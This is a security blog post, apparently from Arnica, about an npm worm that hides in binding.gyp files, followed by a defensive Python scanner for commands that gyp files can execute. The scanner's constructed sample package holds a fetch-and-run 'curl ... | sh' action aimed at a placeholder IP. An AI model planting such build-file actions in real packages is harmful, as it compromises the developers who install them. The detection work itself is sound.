binding.gyp npm Supply Chain Attack: What Arnica Customers Need to Know (June 2026)
Blog post from Arnica
A self-replicating worm is spreading through the npm ecosystem by embedding itself in the binding.gyp file of infected packages, a build configuration file that most security tooling does not inspect. The worm does not need a bug in the registry itself: when a package ships a binding.gyp at its root and defines no install or preinstall script, npm's default install step is `node-gyp rebuild`, so commands placed in that file run at install time without any package.json lifecycle hook for scanners to flag. First identified by StepSecurity on June 3, 2026, the worm uses a three-stage payload that steals credentials, injects itself into CI/CD pipelines, and poisons further packages.

It leverages stolen GitHub tokens to insert backdoor files and potentially influence code generation, a significant risk to software supply chains. It targets a wide array of developer credentials and exfiltrates them through encrypted dangling commits, which complicates detection because the data never appears on a branch. As it spreads, it modifies GitHub Actions workflows to ensure ongoing execution, compromising numerous packages and maintainers.

In response, Arnica has deployed detection rules to identify compromised packages and offers tools such as DepsGuard to help developers and security teams put preventive controls in place, underscoring the need for proactive defense in software development environments.
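The two properties described above, an install step that npm triggers implicitly and a payload that lives in a build file rather than in package.json, can be checked directly in a dependency tree. The following is an added example written for this page; it is not Arnica's detection logic, not DepsGuard, and not code from StepSecurity. It parses binding.gyp (which is Python literal syntax, not JSON), reports every place a gyp file can execute a command (`action` lists under `actions`/`rules`, and `<!(cmd)` / `<!@(cmd)` command expansions in string values), and flags packages where npm would run `node-gyp rebuild` because no install or preinstall script is defined. The sample package, its name, and the `curl ... | sh` action are constructed stand-ins, not artifacts from the worm; the exact delivery mechanism the worm uses inside binding.gyp is not stated on this page, so treating gyp actions and expansions as the execution surface is an assumption of this example.

```python
import ast
import json
import os
import tempfile

# Constructed sample, not a real worm artifact: package.json defines no install or
# preinstall script, so npm's default install step is `node-gyp rebuild`, and the
# binding.gyp carries an "actions" entry that runs a shell command during that build.
SAMPLE_PACKAGE_JSON = {
    "name": "example-native-addon",       # hypothetical package name
    "version": "1.0.0",
    "scripts": {"test": "node test.js"},  # no install/preinstall: node-gyp runs implicitly
}
SAMPLE_BINDING_GYP = r"""{
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/addon.cc'],
    # command expansion: legitimate addons use this to locate headers
    'include_dirs': ["<!(node -p \"require('node-addon-api').include\")"],
    'actions': [{
      'action_name': 'prepare',
      'inputs': [],
      'outputs': ['prepared.txt'],
      # constructed stand-in for a fetch-and-run payload (TEST-NET-3 address)
      'action': ['sh', '-c', 'curl -s http://203.0.113.7/x | sh'],
    }],
  }],
}
"""


def parse_gyp(text):
    """binding.gyp uses Python literal syntax (single quotes, # comments, trailing
    commas), which is why json.loads() rejects it. ast.literal_eval parses it
    without evaluating any code."""
    return ast.literal_eval(text)


def npm_would_run_node_gyp(pkg_dir):
    """npm defaults the install step to `node-gyp rebuild` when binding.gyp sits at
    the package root and package.json defines neither install nor preinstall."""
    if not os.path.isfile(os.path.join(pkg_dir, "binding.gyp")):
        return False
    with open(os.path.join(pkg_dir, "package.json")) as f:
        scripts = json.load(f).get("scripts", {})
    return not ({"install", "preinstall"} & set(scripts))


def find_command_execution(node, path="", findings=None):
    """Walk a parsed gyp structure and record every point that can run a command:
    'action' lists (under actions or rules) and '<!(cmd)' / '<!@(cmd)' expansions
    inside any string value, including those nested under 'conditions'."""
    if findings is None:
        findings = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "action" and isinstance(value, list):
                findings.append({"kind": "action", "where": child,
                                 "command": " ".join(map(str, value))})
            else:
                find_command_execution(value, child, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            find_command_execution(item, f"{path}[{i}]", findings)
    elif isinstance(node, str) and ("<!(" in node or "<!@(" in node):
        findings.append({"kind": "expansion", "where": path, "command": node})
    return findings


def scan_package(pkg_dir):
    """Report whether npm would build this package implicitly and what its
    binding.gyp could execute. Findings are for review, not verdicts: header
    lookups via <!(node -p ...) are common in legitimate native addons."""
    gyp_path = os.path.join(pkg_dir, "binding.gyp")
    result = {"implicit_build": npm_would_run_node_gyp(pkg_dir), "findings": []}
    if os.path.isfile(gyp_path):
        with open(gyp_path) as f:
            result["findings"] = find_command_execution(parse_gyp(f.read()))
    return result


def write_sample_package(pkg_dir):
    with open(os.path.join(pkg_dir, "package.json"), "w") as f:
        json.dump(SAMPLE_PACKAGE_JSON, f)
    with open(os.path.join(pkg_dir, "binding.gyp"), "w") as f:
        f.write(SAMPLE_BINDING_GYP)


def demo():
    """Materialise the constructed sample in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        write_sample_package(d)
        return scan_package(d)


if __name__ == "__main__":
    report = demo()
    print("npm would run node-gyp rebuild on install:", report["implicit_build"])
    for finding in report["findings"]:
        print(f"{finding['kind']:10} {finding['where']}: {finding['command']}")
```

To apply this to a real tree, call `scan_package` on every directory under `node_modules` that contains a binding.gyp (or on an unpacked tarball before publishing). Expect legitimate expansions such as `<!(node -p "require('node-addon-api').include")` in healthy native addons; the signal worth chasing is an `action` or expansion that reaches the network, invokes `sh -c`, decodes base64, or touches `.git` or `.github/workflows`, especially in a package that has no native source files to build in the first place.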